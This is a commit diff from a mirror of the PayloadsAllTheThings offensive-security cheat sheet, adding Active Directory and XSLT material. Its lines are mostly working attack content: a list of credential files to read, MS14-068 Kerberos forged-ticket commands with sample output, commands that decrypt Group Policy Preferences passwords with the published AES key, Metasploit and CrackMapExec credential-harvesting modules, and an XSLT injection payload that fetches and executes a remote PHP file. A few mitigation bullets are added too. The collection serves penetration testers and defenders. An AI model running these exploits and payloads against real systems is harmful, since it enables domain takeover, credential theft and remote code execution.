mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
AD mitigations
This commit is contained in:
parent
1535c5f1b3
commit
4b10c5e302
@ -117,6 +117,8 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
|
|||||||
/home/$USER/.bash_history
|
/home/$USER/.bash_history
|
||||||
/home/$USER/.ssh/id_rsa
|
/home/$USER/.ssh/id_rsa
|
||||||
/var/run/secrets/kubernetes.io/serviceaccount
|
/var/run/secrets/kubernetes.io/serviceaccount
|
||||||
|
/var/lib/mlocate/mlocate.db
|
||||||
|
/var/lib/mlocate.db
|
||||||
```
|
```
|
||||||
|
|
||||||
### Interesting Windows files
|
### Interesting Windows files
|
||||||
|
@ -9,7 +9,7 @@
|
|||||||
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||||
- [Open Shares](#open-shares)
|
- [Open Shares](#open-shares)
|
||||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||||
- [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
||||||
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
|
||||||
- [Using ndtsutil](#using-ndtsutil)
|
- [Using ndtsutil](#using-ndtsutil)
|
||||||
- [Using Vshadow](#using-vshadow)
|
- [Using Vshadow](#using-vshadow)
|
||||||
@ -214,11 +214,22 @@ Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
|
|||||||
```
|
```
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
|
# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
|
||||||
git clone https://github.com/SecWiki/windows-kernel-exploits
|
$ git clone https://github.com/SecWiki/windows-kernel-exploits
|
||||||
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
$ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
|
||||||
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
|
||||||
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
|
$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
|
||||||
|
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
|
||||||
|
-1105
|
||||||
|
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
|
||||||
|
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
|
||||||
```
|
```
|
||||||
|
|
||||||
Then use `mimikatz` to load the ticket.
|
Then use `mimikatz` to load the ticket.
|
||||||
@ -237,6 +248,11 @@ Linux> sudo date -s "14 APR 2015 18:25:16"
|
|||||||
Windows> net time /domain /set
|
Windows> net time /domain /set
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Mitigations
|
||||||
|
|
||||||
|
* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
|
||||||
|
|
||||||
|
|
||||||
### Open Shares
|
### Open Shares
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -317,11 +333,11 @@ IconIndex=1
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
### Passwords in SYSVOL & Group Policy Preferences
|
||||||
|
|
||||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||||
|
|
||||||
Find password in SYSVOL (MS14-025)
|
Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
|
||||||
@ -338,20 +354,22 @@ echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d
|
|||||||
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
|
||||||
```
|
```
|
||||||
|
|
||||||
Metasploit modules to enumerate shares and credentials
|
#### Automate the SYSVOL and passwords research
|
||||||
|
|
||||||
```c
|
* Metasploit modules to enumerate shares and credentials
|
||||||
scanner/smb/smb_enumshares
|
|
||||||
post/windows/gather/enum_shares
|
|
||||||
post/windows/gather/credentials/gpp
|
|
||||||
```
|
|
||||||
|
|
||||||
Crackmapexec modules
|
```c
|
||||||
|
scanner/smb/smb_enumshares
|
||||||
|
post/windows/gather/enum_shares
|
||||||
|
post/windows/gather/credentials/gpp
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
* Crackmapexec modules
|
||||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
|
|
||||||
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
|
```powershell
|
||||||
```
|
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
|
||||||
|
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
|
||||||
|
```
|
||||||
|
|
||||||
List all GPO for a domain
|
List all GPO for a domain
|
||||||
|
|
||||||
@ -364,6 +382,12 @@ Get-NetGPO
|
|||||||
Get-NetGPOGroup
|
Get-NetGPOGroup
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Mitigations
|
||||||
|
|
||||||
|
* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
|
||||||
|
* Delete existing GPP xml files in SYSVOL containing passwords.
|
||||||
|
* Don’t put passwords in files that are accessible by all authenticated users.
|
||||||
|
|
||||||
### Dumping AD Domain Credentials
|
### Dumping AD Domain Credentials
|
||||||
|
|
||||||
You will need the following files to extract the ntds :
|
You will need the following files to extract the ntds :
|
||||||
@ -679,7 +703,7 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
|
|||||||
```
|
```
|
||||||
|
|
||||||
Mitigations:
|
Mitigations:
|
||||||
* Have a very long password for your accounts with SPNs
|
* Have a very long password for your accounts with SPNs (> 25 characters)
|
||||||
* Make sure no users have SPNs
|
* Make sure no users have SPNs
|
||||||
|
|
||||||
### KRB_AS_REP Roasting
|
### KRB_AS_REP Roasting
|
||||||
|
@ -132,6 +132,20 @@ Execute the function `scandir`.
|
|||||||
</xsl:stylesheet>
|
</xsl:stylesheet>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Execute a remote php file using `assert`
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
|
||||||
|
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
|
||||||
|
<xsl:variable name="payload">
|
||||||
|
include("http://10.10.10.10/test.php")
|
||||||
|
</xsl:variable>
|
||||||
|
<xsl:variable name="include" select="php:function('assert',$payload)"/>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
|
||||||
Execute a PHP meterpreter using PHP wrapper.
|
Execute a PHP meterpreter using PHP wrapper.
|
||||||
|
|
||||||
```xml
|
```xml
|
||||||
|
Loading…
Reference in New Issue
Block a user